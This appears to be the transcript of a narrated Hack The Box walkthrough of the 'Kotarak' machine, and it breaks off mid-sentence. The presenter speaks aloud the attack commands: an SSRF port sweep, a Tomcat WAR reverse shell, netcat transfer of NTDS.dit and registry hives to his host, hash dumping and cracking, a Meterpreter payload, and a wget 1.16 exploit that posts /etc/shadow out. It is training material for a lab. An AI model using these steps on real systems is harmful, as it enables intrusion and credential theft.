Hello, welcome back, or welcome to Sabretooth at Nethemba, where we care about your security. Hack the Box Friday. You'll see that all of page 1 is done. All of page 2 is actually, before we do that, let me just start a scan running on this, then I'll go through all my intro. So Nmap, T5, all ports, aggressive scan, and off we go. Right. So all systems on page 1 are complete. Excuse the train going past if you can hear it. All systems on page 2 are complete. And we are well into page 3 now, with a few done at the top. At least I think so. Yeah, so we've done the first 3, and we've also done the last 1. Typical when I start recording, a train goes past. I mean, I can't help the trains, but you know. So Kotarak is a hard system apparently, and it's only got 3,000. It's not even got 2,500 routes. Seriously, how long does this train want to be? Ridiculous. So we're running an Nmap scan. There we go, that's done. It's not got too long left, which is nice. So we'll make sure everything's ready in our notes. I'm not sure what to expect on this one, or any of them really. I've not spoken to anybody about this one. I've not spoken to Rick. I've not spoken to Laura. I've not spoken to any of you guys, or you've not spoken to me. So either way, interesting that this is only 8 hours now instead of 24 since they've redone the thing. I suppose that's fine. We're hopefully not going to need 8 hours, you know. I forgot what I said I was going to do about the, let's do a quick scan first and then a long scan whilst we're looking into stuff. Yeah. It doesn't matter, we're there. So we've got port 22 for SSH, nothing interesting there. 8009 Apache JServe. Huh. And then we've got Tomcat here. Is that like the Tomcat 8009? Yeah, maybe. Don't mind me, I'm just going through things in my mind. 60,000, very weird. Kotarak web hosting, right. So, what we will do to make things a little bit more manageable is we're going to add this to sudo nano etc hosts. And because I can never remember how to spell Kotarak, well, I suppose it's up there all the time, so it might not be that bad. I think what I'm going to do here is put that in, followed by kot.htb. How's that? Yeah, that makes it a bit easier. Nice. So let's take a look at web first. So we're going to go http kot.htb. That shouldn't be open, but 8009 is. Secure connection failed. Right, so let's get rid of the S in HTTP. Connection was reset. Okay. Fine. Fair enough. Then we've got 80, 80, and 60,000. So let's try 80, 80. Okay. Manager.html. This is what I normally try when there's Tomcat, just in case there's a control panel available. Right, there is indeed. So let's look up Tomcat manager defaults creds. Manager, admin, system password are the main ones. So we'll try this again. Manager. Oh, there you go. Manager. What were the other ones? Admin, system password. Admin, system password. Okay, so no good. I'm just going to put this exists, but default creds don't work. I quite like it when you're able to get access to the Tomcat manager, because You can generally upload a war file, WAR, and get a reverse shell quite easily. I found in the past this was a like PWK, you know, the OSCP course thing, and it was also in VHL. Excuse me, VHL boxes as well. However, it doesn't seem to be the case here, at least not immediately. Admin. Okay, fine. Fine. I mean, I suppose, yeah, there are a few other... Okay, enough. We'll come back to that idea if we need to. So 8080 isn't good for now. Let's have a look at 60k because... this looks quite interesting. Is a custom web. So let's actually start here. We're going to go with robots.txt and then we'll run a brute force. Because why not? I need to get used to the fact that index.php... Does that exist? It does. So if we're running PHP, I need to get used to using dir search as well as the other one, GoBuster. I keep forgetting dir search, so I'm actually going to make a point of starting with that one every time, especially if I know it's running PHP. So I'll leave that for now, and then I'll try GoBuster in a second. Look, it's already 403 though. Okay. So what we'll do is put in test and submit. It's slow, but that might be because I'm running this. We've also got help and admin, but these don't go anywhere according to what I'm seeing bottom left. Interesting. So we'll wait for this to finish. Am I in frame? I am in frame. Path test. url.php path test. Path url.php. What about that? See if we can load itself. Will that break it? And it's got index.php, info.php. I'll have to look at that in a second as well. In fact, let's save a bit of time and load it in info.php. Now we can see what it contains. I probably need to wait for this to finish because it seems to have slowed to a halt. So we've not got long to wait. It's on like 14.5k out of 16, 15k out of 16. So we're about there. URL PHP is just found. Don't think there's going to be much else at this point. There we go. Nice. Now let's see if we can load this. Open this in a new window and just go straight to info.php and see what happens. Okay, nice. Nice. This one not so nice. Okay. Anyway, dirt search shows we have that. We also have url.php, but I'm actually going to put the whole thing on this. I don't quite know what it's trying to do with this. I don't like the fact it's taking forever about it. Let's try it in a new window, see what happens. url.php path info.php. Is that going to load? Tell you what I can do. I can, let's say I go into Preves scripts. It doesn't matter what I'm going into, just something like this. Preves scripts. Is that still loading? Yeah, it's not doing much. Oh, I didn't mean to do that. Oh, come on. How do I connect it back to the... There we go. Use source on this one, see what we've got. Nothing. Right, what if I do improve scripts just so there's something here? Sudo Python 3. I'm just going to create a server, you know, HTTP server on port 80. What if I do this? Then what I can do is get my IP, which is, I don't know, this one. What if I try to just load in that? Okay, right. Huh. Interesting. So it loads in using the path variable. Right. Path variable can be used to load in other sites. Interesting. I'm not sure what to do with it. I could try loading in a reverse shell. The problem is, if I load a reverse shell from my server, if it's based on my server and loaded in by this website, I've got a feeling the shell I'm going to get back is for my own system. Let's take a yeah, let's I'm in two minds on this one. We'll try it. There's no harm in trying it, right? So cd shells, we are going to nano php reverse shell.php. We're going to set our IP of not that one, this one, 1010, I can't remember what it was, but it should just be here, 10.10.14.9. And we'll do 1, 2, 3, 4 because that's what we're used to doing, right? So if I do nclvp1234 to get a shell back, I've got a feeling I'm going to get a shell back on my own system. I'll be perfectly honest. What's that doing there? I thought I'd done that on the end. Oh, stupid. Right, let's run that again. So we've got a server running here, nclvp1234. Okay, nclvp1234, better. So now if it loads this in, it's got all these, and if I load in this file, okay, well, we'll do it here. PHP reverse shell.php. That doesn't look good. We don't get anything back. Right. So it looks like whatever it loads in here, it can't run PHP code. It's just static HTML. That is not ideal. That is really not good. Right. Well, what about the load itself? Port 60,000. Right, it's loading itself in now. What about port 22? Right, okay. Okay, it can also load itself. And so my thinking now is, what if we can use this as like server-side request forgery? What if we brute force the port number and see if there's any internal ports which we can't access from the outside using Nmap? It won't bring it up. If they're only open internally, we might be able to load it through this site. Cool, let's do that. It might take a while, but we're going to try it. I could write a script, but the easiest thing to do right now is just use burp. I've got green tea, which is incredible. If you find green tea too bitter, splash of milk. Try it. I know you're like, oh, what, really? Yeah, try it. Splash of milk. It just mellows that bitterness. It's so nice. So burp updates are ridiculous. Praise the sun. Right. Don't mind me. I've just got Soler just offering me support on this side. This could take a while, but I just want to show you how I'm going to do it, and then I'm going to wait. I'm going to leave the video, obviously, whilst it's doing the thing, and then we're going to come back and go through the results together. But there's no point in waiting for the whole thing to finish because it will take a while. We're going to use Burp Intruder. That noise is my watch dying. I've started using my Fitbit again, so my other watch I'm no longer using, and the battery's been trying to die for the last 4 days. It's ridiculous, really. No update on the next restart. Don't do it now. Okay, so if I proxy and set it to use burp and do this, get rid of that now. That's fine. It doesn't need to be attached to burp anymore. We just need burp itself with this request here. Let's throw that to the repeater. So this number here, 22, we're going to send it to the intruder, and that should automatically be highlighted. And all we're going to do, I know that my face is here, so let me do this so you can see it a bit better. Now you see I'm learning. It's taking a while, but I'm learning. What we're doing is just numbers. And we are going from port 1 to port 65535, which is like the last one at a time. We're going to hit start attack. And literally that is it. We are just sort of waiting, and you'll see that it's got like response received. It's got a value here, but it's got length. All right. Now 205. If we look at the response of this, it says okay, but nothing's come back. If we get to port 22, which we know is open, 265. This is much bigger than the ones around it, and the response here has SSH, right? So all we need to do is sort this by length, and the bigger, so we've got port 888, 320, 8080 we know has got something on that, 110, 383, we've got the database here, like 350, and I think everything else is like 266, 265, we're not, oh no, maybe these as well, 22 as we know, 200, everything from 1 onwards down here is not good. So look at this. We're actually, I was going to stop the video and come back, but we're already like 27,000 in. So what I'm actually going to do is just take a screenshot of this. I'm going to pull that back. I'm going to do that. In fact, we're going to get rid of that entirely. That'll do. That'll do. So let me do a screenshot here. Print screen. Nice. So we can use burp intruder, or whatever script you decide to write, to brute force the ports, looking for internal services, right? And we have that. So the one with the biggest response by a long margin is 888. We've also got 320. So I want to leave 888 for last because I've got a feeling that is the way to go. But we'll try the others. 320. Well, we don't have to. We can look at 320 here, and you can see that we've got a accounting web page back. Well, let's take a look. Let's take a look. Super sensitive login page. It seems a little bit of a bait, to be honest. Maybe that would be useful for brute force. Problem is, if we do admin, it's going to send it to the wrong page. I didn't think about that. Okay, so we'll think about that one. 60,000 we know about, 110, 90, and 3306. We'll just take a look here. 110 again is favorites, bookmark title goes here. Let's take a look at 110. I think some of these are just trying to throw me off the scent. 90 is another website under construction. Please come back soon. Useless. Database here. So we've got a database connection. And that's it. Other than port 22, which we know about, 200 is a hello world, apparently. What about the top one then? Let's go back up. I'm interested in that super sensitive login page, but let's have a look at this one first. Okay, file viewer. So all these files are 0 bytes. That one's 1 byte, blah. And then we've got backup and we've got Tetris. Okay, let me just make a note of this. I'll make a note of the login page as well once we decide we need it. This shares files. It's honestly easier if I just do a, again, you might not be able to, oh, you will be able to see that. You will be able to see that. Let's do a screenshot because why not? Right, I can tell you what the problem is straight off, but I can also tell you how to get around it. The problem is if you look at the bottom right, bottom left here where my cursor is, when I hover that, it goes to URL PHP $doc equals backup, right? And if I do that, we've now lost our port 888 page, you know? But what I can do, I think, is do a / $doc equals, you know, this would work. So we can look for blah and we'll look for, yeah, okay. And that's what's in it. Make sure there's nothing too important in there. And we can do the same with /doc equals Tetris.c. Okay, let's use source on this one and make it easier to look at. There we go. We've got some C code for a Tetris game by the looks of it. Who'd have thunk it with a title like that? Okay, the one I'm interested in more than anything is backup, and that's why I'm doing this one last. Was it just called backup or backup dot something? I can't remember. It was just called backup. Cool. Okay, so let's see what's actually in here. Oh, okay. There's the Tomcat admin console password. Beautiful, guys. Excellent. So this one leads to... Nice. So we should be able to get into that Tomcat manager now. It could also be the password for that super secret, although I can't send it, can I? I've just said that. Unless I change the... I could always change the target, login target, post target. Perhaps. Anyway, this is for the Tomcat manager, so we will go there first. Admin, I can't remember what the password was though. Never would have guessed that. Brilliant. Fantastic. Excuse me. Gives access on port 8080 to Tomcat manager. Right, now as I said, once we have access to this, I generally know how to create a shell or upload a shell. we can upload a war file, but before we do that, we actually need to create one, right? So we're going to clear this. We're going to do MSF Venom. I mean, I could do this from memory, but it makes a lot more sense just to use my cheat sheet here. There. So if I put in war, you'll see here that it says MSF Venom, Java, JSP, shell reverse TCP. You put in the IP, you do it as a war file, shell.war, right? So this is a really, really nice website. So let's do this. Let's not do that. Let's do this. There we go. So we need to put in our local IP, which we have over here. No, here. No, here. Yay. I should know that. 10.10.14.9. It's not that difficult to remember, guys. Do that. We're going to go port 1234. We're going to run this code and create our war file. Could not start server. Okay. Is that required or are we sorted? It does exist. Okay. I still don't like that this is taking forever and not doing much. Right, I'll tell you what, let's remove that. What I'm going to do in another window is MSF console, because that should force the server to start. I hope. So starting database, right, that's enough. That should have done it. So we're going to try this one more time. Nope. Yes. There we go, done. So that's absolutely confirmed it. We've got shell.war right here, which is nice. So let's go back to our manager. We are going to find this file in the what's it called? It begins with K. There you go. To upload the war file and deploy it. It should appear here. It's transferring, so it's taken a while. Not sure why. Ah, there it is. It's under shell. So as soon as I... Oh, is that starting? Is that started? That might be why it's a problem. It's waiting for it to connect. And yeah, that's not good. It was waiting for it to connect and I've not got a listener. I didn't realize it was going to start up straight away. So we're going to do nc lvp 1234. We're going to wait for this to stop. And then we're going to start it one more time. Okay. Is it going to start when this page loads or not? Started application. Huh. Interesting. Let's reload it, see what happens. We're not getting a shell back here, guys. This is quite unusual. I think what I'm going to do, though, is if we look in the war file, I was going to use unzip, but what's the... I can't remember the flag just to... I think it might be L. Like, list the files. Yeah, there it is. So this is the JSP file right here. That's inside the war. So I'm kind of wondering whether I could just go there. I might not need that. Nah. Okay, what if I do that now? Okay, let's click on shell itself. Maybe put it in here. Oh, we've got a connection. Brilliant, we actually got shell back. Perfect, right. Okay, right, we upload the WAR file to the server using the panel and start it, but it doesn't give us a shell. Instead, we find the JSP page, which was here. You can see I've done this a few times to know things like this, right? And load it directly. I mean, it's been a while, but the fact that I still know how to do this is great. And we then get a shell. So I don't like the fact we're not going to prompt. So we're going to which Python? Python C, import pty spawn bin bash. Great. Okay, so it's repeating my command, but at least we've kind of got a working shell now, which is better than nothing. Right, we've got a shell on the system. Ooh, nice. Tea break. Maybe I could have, instead of a JSP shell, maybe I could have, instead of a Java-based shell, I could have loaded a legitimate bash shell, but whatever. We're going to cd into home and have a look around. A 10s and Tomcat. So I should have access to Tomcat, but let's do that first. Permission denied. Okay, so we're going to cd into Tomcat, see if there's anything in there to archive. Hooray! So it's owned by me. Okay, so we've got something here. We might not need to use limpies just yet, at least. We've got a to archive. Let's see what's in there. Pentest data. Ooh, we like this. CD pentest data. Dit file is a it's Active Directory NTDS. Okay, NT Directory Services. Yeah, core database for the Microsoft Active Directory AD. I knew it was related. I couldn't remember what it was. So that's the NTDS. So does that mean if that must be the Hive then, I guess. Nice. Right. Okay, let me explain this. So with these two files, we should be able to extract all the hashes on an Active Directory system. 192.168.110.133. Okay, I need to get these two files onto my system, basically. So, go away. How am I going to do it? What about NC LVP 9999, and that's going to go out into, we're just going to call it ntds.dit. So that's listening. And from here, I'm actually going to send this file out to my system. So nc, whatever my IP address is, 10.10.14.9, I think, on port 9999. And into that, we're going to put this file. Oh my God, that's not good. Oh, I know why. It's because you need to put a space. It's not a web thing. So you need to put a space and then the port, right? And then this file goes into the connection. And here, the file comes out of the connection and is stored, right? And it's got some stuff in it, which is nice. 16793600. And this is 16793600. So it has transferred the whole file, right? We're going to do exactly the same for this file here, and we're just going to call this one the hive.bin. So we're going to do the same. nc 10.10.14.9 9999, and into that we're going to put this file, but we're not going to send that yet, because the first thing we need to do is do a listener. I'm going to call that hive.bin. So get the listener running first, get this running next, and we should now have both files here. Perfect. Okay, good. So now we have both these files. What I'm going to do is, hang on, I really need to make a note of this. I've not made a note of any of this, have I? Right, this looks ridiculous. So, okay. Right, do that. So ntds and hive transfer to local system using netcat. I don't really need to say how, we know how it works, you know. And then I'm actually going to make things a little bit easier by moving a file here. We're going to copying a file. We're going to go backwards into tools. We're going to go into InPacket. We're going to go into examples, and I think it's called secrets dump. That was it. I thought it was security dump, but secrets dump.py. We're going to copy it here. We are going to run Python 3 secrets dump, and just see what the options are, right? It says that we need, oh my God. So ntds file is an option, and we need the security file. That's the hive. Do we need anything else? Let's have a look. ntds file is that, and it needs to be double, doesn't it? Oh no, just one. Fine. Security can be that. Following arguments are required. Target. I don't know, let's put an X. What does it want for target? What does it want for target? I really don't know. Maybe I can give it cots.htb and see what happens. Huh. Okay, I thought that was how to use this, but obviously it's not. Secrets dump entity and security. Let's do a 127001. Maybe this isn't what I need. I'm going to do a bit of research, guys, and then I'm going to come back. It just makes the most sense just to figure out how to actually use this app. Because I don't want to spend time looking for it on here. Back in a minute. Okay, according to RTFM, I can just use local. I've not tried it yet, but according to the book, which is always worth having this book. I can literally just put local here and it will work. I'm not sure if it will. Either the system hive or boot key is required. So do I need a double on that and a double on that? Because I'm sure I did. I don't. Huh. System hive. Maybe instead of security, I'll try system. It's because it's security dot. Oh no, it's secrets dump, isn't it? Well, whatever. I'm an idiot. It works. It works. It just. I've not used this for ages. Okay, let's take a look. So Windows, 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 nice. So these are probably all from a different system because we are definitely on a Linux system, aren't we? This is what we need here. So we're going to embolden that. And what we can, are we recording? We are. Good times. What we can do is basically just grab the, we could actually just like use cut or whatever to do this, but it's not too difficult to do it this way. And by the time I've figured out a decent cut command, it's probably much easier to do it this way. I think we just need the last section of this after that last column. It, like I said, it doesn't take too long to do it this way. Because these are the NTLM hashes, so we just need the last part. And we also need to get rid of that final this as well at the end here. We can now send it to RockU and try cracking it with John the Ripper or Hashcat. I think I'm going to go with CrackStation first, just to see if there's anything here which it has. And if not, then we'll do it that way. So let's do this CrackStation, because this is just the easiest thing to try. Okay, so we've got F16 Tomcat, we've got password 123, we've got a couple of results, not many, but maybe that's all we need, maybe not. What have I done? Let's go again. Oh, okay, that's fine. It did already have the thing, I just didn't realize it. Okay. So CrackStation. Cool. So we need to figure out which ones have been cracked. The one ending in 8FE and the first two, basically. So administrator has been cracked. That's interesting. Atanas has been cracked. I don't think the root password is going to be F16 Tomcat, but we can try these things. We're going to do SU password. Right. Okay. Let's try SSH as Atanas at cot.htb, and that's password 123 exclamation mark. Permission denied. Okay, F16 Tomcat. Maybe, just maybe, I don't have access to use SSH as that user. It might not have an SSH key. So let's just try SU as Atanas. Password 123. Okay. So not that either. Interesting. Hang on a minute. So I can't SU. Oh, I didn't try F16 Tomcat. SU. Do I need to do user Atanas or do I just do Atanas? Oh, so F16 Tomcat was Atanas' password, even though that was the admin password. Interesting. Right, okay. I didn't try that on SSH, did I? Or did I? I can't remember. I think I did. Yeah, it won't let me in like that. Okay. Okay. Right, well, it works. We cannot SSH as Atanas, but we can do that. Okay, we are now another user. How fun is this? Sudo. Go away. Go away. There we are. Sudo L. Hello. My shell is broken. Okay. I've got a broken shell. So that's not good. That's really not good. I can load that, get back in. I can't do that because it requires that I need... this is absolutely broken. Right. What I'm going to do is try and get a more stable shell at this point. I'm going to try and get a... Go away. I'm going to try and get a much more stable shell. So we're going to... I know what we can do. We can do cat etc release. It's actually the OS release, right? That's not what I wanted. Uname A. It's 64-bit Linux. Okay. So what I'm going to actually do here is... So this is just bugging me slightly because it's one of these which, you know, should work, maybe not. So Linux 64-bit, we're going to get a reverse shell. Stageless, non-meterpreter. Meterpreter. I mean, meterpreter is probably the way to go, I'll be honest. We'll try this. We'll try this. Just to see if we can stabilize our shell ever so slightly, right? Let's go here. Let's just swap out this. What? Why? I'm getting really annoyed. What's my command now? Oh, whatever. Whatever, I know it anyway. 10, 10, 14, 9. Right, 2, 3, 4, 5. Let's actually try creating this. Here. kill that, copy the command, excuse me sir, put that there. Have I just closed that shell? I have, yeah I have, accidentally. No I haven't, it's here. I'm just I'm getting a little bit confused about everything now. So right, that's fine. We're going to wget 10 10 49. I can't remember the name of the file. Shell x64.elf. Shell x64.elf. So we're going to get that. Right, I'm going. I'll be back soon. I've just had enough of this for now. Going for a walk. Try it again. Right, I'm back. I think it was working, but I think it just wasn't showing me any output. So, I've got my shell. I've changed my mind. I want to actually do a Meterpreter shell because at least I know they're really, really like stable for the most part. So let's try a Meterpreter shell and see what happens. Meterpreter binaries Linux x64 is here, right? So I'm now going to recreate this. I'm going to recreate this. You can see that I've tried it a couple of times, but that's fine. No, that's an exe file. That's an exe file. That's ridiculous. Why are we doing that? Windows, Linux is here. Ugh. Go away. Okay, so we're going to go again. I just want a stable shell. 10, 10, 10, 10, 10, 14, 9. We're going to use port 8888 because we can. And we're making this file, right? It's shell x64.elf. Okay. So I'm so sure that this might work. I'm going to put this in here, right? We're doing a Meterpreter shell this time. It's here. And it's on port 8888. Now, we're going to need, because it's Meterpreter, we're going to need Metasploit, which I've obviously closed, to actually, to actually grab the shell. But in the meantime, I'm going to get it. We're going to go into temp. Get rid of everything from temp, just because we can. And then wget 10, 10, 14, 9. Shell 64. Is it x64? I can't remember. x64.elf, right? x64.elf. So we've now got a more stable shell here. It doesn't show it, but if I do an ls, you'll see that it's here, right? So we do have it. So what I'd like to do now is go into here, use the multi-handler. We're going to set the payload to be exactly the same as when we just generated that thing here, this one, right? Exactly the same as that. That is going to be our payload. We are going to show options, and you can see it's looking for the L host and the port. So we're going to set L port to 8888, which is what we set our thing as. We're going to set the L host as our local machine, 10, 10, 14, 9. Right. We're going to exploit. That's now listening for a connection. Now that the file is here, we're going to change the mode of that file to executable, and we are going to run shell.whatever. We do that, And now Metasploit is doing its thing. Okay, so get UID. We are Tomcat, right? We can drop to a shell. Who am I? Etc. So now we are in a Meterpreter shell. It should be a little bit more stable. Should be more stable. We can still do the whole Python C import pty pty spawn bin bash. So to make sure we get our there we go. To make sure we get our prompt here, we are going to su as atan. Is it anatas or atanas? Anatas, I think. Right. No, okay. So we're going to su as atanas. Makes more sense. And the password was F16 Tomcat exclamation mark. Who am I? And this time we have a fully functioning shell because it's done through Meterpreter. Now you don't have to use Meterpreter itself, because if you're doing a box like this for OSCP, Meterpreter usage is banned, but you could still use a staged shell with multi-handler. That's permitted. And because it's staged, it is a lot more stable. So there we are. Okay, we run this and get a Meterpreter shell, which is more stable, more so than the Java shell which was running, you know. Lovely. Right, finally we are getting someplace. Next door have I'm always complaining about my neighbours. Next door currently have like a washing machine or something pressed right up against their wall, and it buzzes through our entire house when it's running. Anyway, that's what, if you're hearing any noise, that's what it is. Good news is we can now do stuff as this user, and we can even try doing what we was going to do before, sudo l. Oh, we can't. I thought we could. So what we can do is terminate the channel and then go to shell, and now we've got channel 2, and you can see we can just keep recreating new instances of the shell rather than terminating the whole thing and going back and so on and so forth. The one thing which I do still need to keep doing is this, but I've got a feeling then that sudo l is not the way to go. I can never remember. Tanas, F16 Tomcat. Okay, good. So I was sort of wrong with the whole su thing, sudo thing. For some reason it doesn't like sudo, so that's a little bit worrying. Anyway, let's do something fun like upload limpies, because I'm not sure what else to do at this point. You see, I could go back into the main Meterpreter and just use the upload command. It makes things a lot easier, but let's just do things the way I was doing it before. We're going to go into, not shells, but privs scripts would be nice. Then run that again. Nice. And then we can literally just let's move this one right to the end so I know where it is. We can do get 10, 10, 14, 9 limpies. Change mode of everything, and then run limpies dot. Nice. Right, good. We've made a start. We've got a P smiling at us. That's pretty much a good start. I'm just waiting for this to run a little bit. What was I meant to do? Just checking. Still in frame. Keep checking. It's all good. So far, this has been quite pleasant. There's been nothing overly complicated about it. A couple of things that are bugging me, but everything seems to be working fine. I don't like that this is taking for... Ooh, we're part of the disk group, are we? Interesting. Huh. So that means if we're in some sort of container, we can use the disk group to... In fact, we should be able to make a whole copy of the disk on our local system, perhaps. I've done that before. Huh. Okay, right. Limpy's shows... Disk is yellow and red. So that could be the way in. This is taking ages. But let's have a read through everything else, because there could be multiple ways in, or maybe there could be more information about why we are part of the disk group. So it's worthwhile taking a look at everything. So SD disk in dev, we've got SDA, SDA1, 2 and 5. So there are a few disks here. Might be able to use that to my advantage. Environment. Yeah, broken pipe, okay. Got all these exploits. All these exploits. So I'm not in a container related tools. We've got user bin LXC. I'll take a look at that actually as well, if need be. Not done much with it like LXC before, at least on these videos is what I mean. It's not like I've never done it before, but it's the first time for everything. What else do we have here? Hang on a minute. Okay. Apache 2, okay. Cron tab, okay. We have cron jobs here. I think we've got cron jobs running, which we may have to check as well. Might be wrong. Got listeners, never care about listeners. Read writes, okay. Okay, everything so far is okay. Huh. So localhost obviously is localhost, but 127.0.1.1 is Kotarak. What? What's happening there? Huh. What? It's got 10.0.3.1 LXC again. What is happening? Okay, I have config shows. That's very odd. Okay, let's carry on looking. What do we have here? Okay. We know about all these ports because we've just done a port scan using Burp Suite of all things. Again, we're part of the disk group. Again, it can't check sudo, so that's obviously not just me as having a problem there. Super users root, yes, we. Oh, don't do that. Yep. Okay, all good. Root, and then let us test SU as any other user. Yeah, okay. Ooh, we've got authbind. It's interesting. It's very rare. Let me explain what authbind does. In fact, it's easier if I just look it up, because if you try and, there you go, it says it right here. The authbind software, oh, that sucks. Let's just take it from here. The authbind software allows a program that would normally require super user privileges to access network services. So for example, you know when I try and listen on port 80 on my system, I've got to use sudo. This allows you to do it without sudo, which is really cool. So it means I can listen on ports which, you know, I normally wouldn't be able to. I'm not sure what we're going to use that for, but I mean, it's there. I'm just wondering why it's there. It's not a normal. Everything else here looks absolutely normal, except for LXC perhaps. Everything else here looks absolutely... It's even got Python 3 as well. Sudo, wget, it's fine, you know, it's all there. It's not a problem. But authbind is a very weird one. MySQL... Okay... Virtual hosts, okay, that makes sense on all these ports. Right, okay. Permit root logging on port 22, that's quite nice. So why have we got home Atanas config LXC client key? Interesting. It probably isn't an SSH key, but I'm wondering why it's got LXC access or related stuff in Atanas's directory. Some certificates were found. SSH configs file found. Searching sessions, password files. FTP files, interesting logs, Windows files. Yeah, okay, nothing weird about that. Hang on a minute, how is it reading what's in root's directory? How's it got, what? And here as well. Huh? Files with interesting permissions, let's take a look. We've got nothing here for SUID, nothing here for SGID. Capabilities are a bit of a bust this time around. Searching root files in home directories. How is it reading all these? Have I got read access to root? Look. Writable files owned by me. How are these owned by me? Right, okay. There's some misconfiguration happening here. We'll take a look at that as well. That's really intriguing. If we can just read the root flag and it's owned by me, then that's us done. Weird. Weird. So we've got authbind. This box is more confusing than anything else at the minute. I wouldn't say it's difficult at the minute. There's just so many ways to go, you know? So many ways. Look at this. var www html html2. Oh, these are all the different websites, like the super secure login and the bookmarks page and stuff. Yeah, don't worry about that. There might be something in there that's important that I've not found, but we'll take a look soon. So sorry, it took me a bit longer than normal to get through that. What is going on? So let's cd into root. How can we read this? So how is the root? Hang on. How is the root flag not in the root directory? Curiouser and curiouser. Anyway, what else have we got in there? We've got app.log. So cat app.log. Huh. What if the root file is on this? Huh. Interesting point. Is that accessible from the outside? It's really not accessible from the outside. Okay. So this is every 2 minutes, but it's in 2017. It's not done anything since then. Is this still active? Oh, I know how to check. I know how to check. It's looking on port 8. It's grabbing this file from port 80, right? Huh. No, one thing at a time. It's grabbing from port 80. So if I do auth bind nc lvp on port 80, just let us listen on it. Will we get a connection back is the question. Like if we get this connection every 2 minutes, will it, you know what I'm trying to say, right? I mean, at the end of the day, it's like 318 now. At the end of the day, it won't be 318. It's 318 now, and by the looks of this is every 2 minutes on even numbers. So we've got 2 minutes to wait. But if it hits 320 and we get a connection, it means that whatever's being called, it must be on a cron job, and it's happening every 2 minutes still. This Wget 116, that is insanely vulnerable. It's like massively so. Search exploits Wget 116. Remote code execution. I think this is what we need. I mean, let's think about this logically. Is this running as root? Is it running as root? Archive target. I mean, if it's able to write to the app log in the root directory, although that app log isn't owned by root, so maybe not. Anyway, we're on 319. If once this hits 320, I'd like to see if we get a connection, because if so, 320, there it is. There it is, look, straight off. So every 2 minutes, this is still running. Help, help. Fine. Yes, it is still active. We can use auth bind in order to, that's probably what auth bind is on there for. Yeah, I thought so. Oh. I should use timeout, shouldn't I? Oh, please don't. Right, we're back to where we were. In fact, we weren't. Now we're back to where we were. Right. So, I think it's time to look up some of these. Let's give it www. What have I used in the past? Probably the remote code execution one, I guess, because I don't need an access list bypass and I don't care about file upload. I mean, yeah, and it's got file upload, well, whatever. We'll take a look. We'll take a look, see what happens. Okay. So Wget 116. Let's take a look at this one first. This one may be complicated. Vulnerability. Okay, we know what it is. Introduction. There we go. Wget before 1.18, when supplied with a malicious URL to a malicious or compromised web server, can be tricked into saving an arbitrary remote file supplied by an attacker with arbitrary contents and file name under the current directory and possibly other directories by writing to wgetrc. Depending on the context in which wget is used, this can lead to remote code execution and even root escalation. If wget is run via a root cron job, it could be a root cron job that's being... Yeah, it could be, as is often the case in many web application deployments. Okay, I can't pretend right now to understand that, but let's go again. Right, if a file is downloaded using wget save file.txt, that makes sense. Okay, an attacker who controls the server can make wget create a file with arbitrary contents and file name by issuing a redirect containing an FTP server reference in response. Okay, I understand all those words in that order. The meaning of them is a little bit fuzzy, but we've got an example. Cool. If the attacker's server replies with this response, I see. So say it's trying to get save file, but on my server, it's trying to get it from my server, right? And on my server, I have it send back a 302 page, like a redirect, to this location on my server, bash profile. Wget will automatically follow this redirect. It will download the bash profile file from the server. It will fail to rename the file to save file.txt as it would normally do. Cool. So what I could do technically is, if it's looking for, well, let's just figure out exactly what it is looking for. If it's looking for archive.tar.gz, then what I could do is have it return a redirect to an FTP server owned by me, which has, for example, etc password on it, right? And if I can have it grab that file and store it in the etc password location, I can overwrite that with a user of my own as root. Okay, I get it. I don't know how it's going to work, but I get it. Because of this vulnerability, an attacker is able to upload an arbitrary file with an arbitrary file name to the victim's current directory, so not etc. So what can I get away with in the root? Maybe it's like a reverse shell, perhaps. Although I still need to run it as root. Execution flow. Yeah, I'm not too worried about the flow. I'll get that idea now. Right, this vulnerability will not work if extra options that force destination file name are specified as a parameter, such as O, which is not the case in that, so we can ignore that. It is, however, possible to exploit the issue with recursive options. No, we've not got that either. Another limitation is that attacker exploiting this vulnerability can only upload his malicious file to the current directory. Yeah, from the root directory from which wget was run. Oh, hang on. I don't know what it was run from on that other system. Or to a directory specified by the P option. So I don't even know what directory that was run from, because I'm in the root directory, yes. And that's where the log is, but that's not the directory that the request is being made from on that other system, right? From the other IP, sorry. Or within web document roots. The current directory limitation could be bypassed by uploading a wgetrc config file. Oh, right, okay. Yeah, sure. Okay. By saving wgetrc in the home victim, wgetrc, an attacker could set... Okay, destined directory, right. So if we can get a wgetrc file on the system, which has like saving etc directory, for example, in there, then it will follow that instead. Cool, that makes sense. So far, so okay. Here is a list of wget settings that can be helpful. Probably that one, output document file. Okay. Right, proof of concept exploit. Let's see if we can figure this out. Cron job with wget. Let's assume that's what we've got, because it is running every 2 minutes, right? Often wget is used in side cron jobs. Yes. By default, cron jobs run within home directory of the cron job owner. Perfect. So if we can get that thingy file, it will be saved in the right place, and the instructions will be followed. Such wget cron jobs are commonly used with many applications. Yes, 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 yes. Do not care. Do not care about that. Such setup can be abused by attackers to upload bash profile file through wget vulnerability and run commands in the context of that user. Nice, okay. As on their next login though, not quite as good. As cron runs periodically, attackers could also write, this is what we need to do, wget-rc file in the first response, because that puts it in the home folder of the user, where it needs to be, and then write a new cron job or something in the second. So, on the first response, we are going to get a wget-rc file from our server, from our FTP server or whatever, and it's stored in the home directory. The next time it runs, because that file is now in place, it follows the instructions in that file. So the cron job has to run twice for this to work. Got it. Got it. This would give them an almost instant root code execution. Right, I understand it. I still don't know how to do it. If the file was writable by Apache, for simplicity, we can assume the attacker already has control over the server. Yes, I do, kind of. That the victim sends the request to. Yes, I do, kind of. The root cron job may look as follows. So it's going to go attacker server database. Okay. In order to exploit this, the attacker first prepares a wget-rc file and starts an FTP server. Let's just do this, you know? Let's just do this. So on my server, my attacker server here, right? I am going to make a new directory, FTP test, right now, here, right here. Right? Then we're going to go into that directory, FTP test. We're good? We're in there? Nice. What we then need to do is post file etc. So it's going to try and overwrite or pull etc shadow. The output document is this root shell. I don't know if I want a root shell as a cron job. Let's just follow the instructions for now. Let's just follow the instructions for now, and then we will modify as we go. Didn't mean to do that. We'll modify as we go. Okay, so far so good. Right, I need to start an FTP server, so we need to install the Python library. The FTP library for Python, yeah. And then we need to start this up on port 21, but of course I need to use Python 3, so permission denied, fine. Okay, so we've got an FTP server running. At this point, the attacker can start a HTTP server which will exploit wget by sending malicious requests to the victim's wget requests. Right, whoa. At this point, attacker can start a HTTP server, yes, which will exploit wget, yes, by sending malicious 